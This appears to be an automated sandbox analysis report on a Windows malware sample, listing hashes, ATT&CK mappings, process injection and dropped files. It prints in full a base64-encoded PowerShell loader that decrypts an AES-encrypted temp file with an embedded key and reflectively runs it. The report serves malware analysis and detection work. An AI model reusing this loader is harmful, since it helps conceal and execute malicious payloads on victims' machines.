4f20e2ea3367ba6193bd966e8282aa4b2c0d5047283543ac17382421465cd5b9

General

Target

PEDIDO#140404-AB2324.exe
Size

1.3MB
MD5

5632476c595eec38bc4fdf29848521c0
SHA1

d56e3c24341e207fe9cec9742a135df0a66796e4
SHA256

fb9154259baeba38fcb25fae2d53b8b498a68d451478d067d04e849606f33c6e
SHA512

c96e708b3b33d242be36c2e65a52d1f7da04b833aeddcd7e4e93dd136b92cff82bffca032fca40f3544809368ff86517c868db13110138bf17c423ac69045a80
SSDEEP

24576:O4WXhHQqP1synFS5noo7971QJL8+Ra6uEwkvLBA03W:Ojd9P1syn/oR71QJZRNuEwkvLd3W

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1280	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1280	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1280	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2856 wrote to memory of 1280	2856	PEDIDO#140404-AB2324.exe	29
PID 2856 wrote to memory of 1280	2856	PEDIDO#140404-AB2324.exe	29
PID 2856 wrote to memory of 1280	2856	PEDIDO#140404-AB2324.exe	29

C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe
"C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABCAEUALAAgADAAeABEAEYALAAgADAAeABCADgALAAgADAAeABBAEUALAAgADAAeABCADYALAAgADAAeAAxAEQALAAgADAAeABGADAALAAgADAAeABBAEUALAAgADAAeAAzAEEALAAgADAAeAA2AEEALAAgADAAeAA4AEMALAAgADAAeAAzAEYALAAgADAAeAAwADkALAAgADAAeABBAEEALAAgADAAeAA3ADMALAAgADAAeAAxADgALAAgADAAeAA3ADIALAAgADAAeAA0ADAALAAgADAAeAAzAEYALAAgADAAeAAzAEEALAAgADAAeAAxAEYALAAgADAAeAA0ADkALAAgADAAeAAxAEEALAAgADAAeAA5ADMALAAgADAAeAAwAEMALAAgADAAeABFAEYALAAgADAAeAAyADIALAAgADAAeAA5ADMALAAgADAAeABGADAALAAgADAAeAAwADAALAAgADAAeAAyADcALAAgADAAeAAyADAAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABDAEMALAAgADAAeABCAEYALAAgADAAeAAxADYALAAgADAAeAA5AEYALAAgADAAeAAxADcALAAgADAAeABBADMALAAgADAAeAA3AEQALAAgADAAeAA1ADgALAAgADAAeAA3ADAALAAgADAAeAA4AEIALAAgADAAeAAzADIALAAgADAAeAA0AEMALAAgADAAeAA3ADgALAAgADAAeAA0ADAALAAgADAAeAA4AEUALAAgADAAeABFAEMAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-3105.putik

Filesize
20KB

MD5
4bbb5cd3041c27a9dd85df1e35dec081

SHA1
46119374a13d578ea9049d8ea91a3abadbdeee8e

SHA256
1d8a4c2788ef4ea0d89774c48acef7ad33b4fb92c21039424a4ff10df8094826

SHA512
c4f5d110a5a91803cdb86a080ae5ab3bf7f67debdd9b71af68908099e907a9896e7c7e60e7467ef2e9800952df5b5a295e69c3877ee0a7c1e1f8532a0f6d7c76

Download Submit
memory/1280-5-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp

Filesize
4KB

Download
memory/1280-8-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/1280-7-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/1280-6-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1280-9-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/1280-10-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/1280-12-0x0000000002BF0000-0x0000000002BFA000-memory.dmp

Filesize
40KB

Download
memory/1280-13-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing